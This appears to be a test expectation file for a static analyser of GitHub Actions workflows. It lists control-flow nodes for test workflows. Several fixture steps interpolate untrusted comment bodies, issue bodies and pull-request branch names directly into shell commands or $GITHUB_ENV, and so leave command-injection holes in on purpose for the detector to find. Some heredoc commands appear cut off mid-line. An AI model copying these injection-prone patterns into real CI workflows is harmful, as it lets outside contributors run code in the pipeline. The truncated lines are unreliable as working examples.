.github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | 
.github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:41:6 
| Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/shell.yml:1:5:1:8 | push | 
.github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:5:1:8 | push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:5:1:8 | push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:5:1:8 | push | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:5:14:5:26 | ubuntu-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:5:14:5:26 | ubuntu-latest | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:16:7:19 | pwsh | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:7:16:7:19 | pwsh | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:16:7:19 | pwsh | .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:10:14:10:26 | ubuntu-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:10:14:10:26 | ubuntu-latest | .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | 
.github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | .github/workflows/shell.yml:12:9:14:2 | Run Step | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:15:14:15:27 | windows-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:15:14:15:27 | windows-latest | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:16:17:19 | bash | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:17:16:17:19 | bash | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:16:17:19 | bash | .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:20:14:20:27 | windows-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:20:14:20:27 | windows-latest | .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | 
.github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | 
.github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| 
.github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | +| 
.github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | 
Job: job1 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | +| 
.github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +cfgNodes +| .github/workflows/commands.yml:1:1:39:30 | enter on: push | +| .github/workflows/commands.yml:1:1:39:30 | exit on: push | +| .github/workflows/commands.yml:1:1:39:30 | exit on: push (normal) | +| .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | +| 
.github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | +| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| 
.github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline2.yml:1:1:89:35 | enter on: | +| .github/workflows/multiline2.yml:1:1:89:35 | exit on: | +| .github/workflows/multiline2.yml:1:1:89:35 | exit on: (normal) | +| .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| 
.github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| 
.github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push | +| 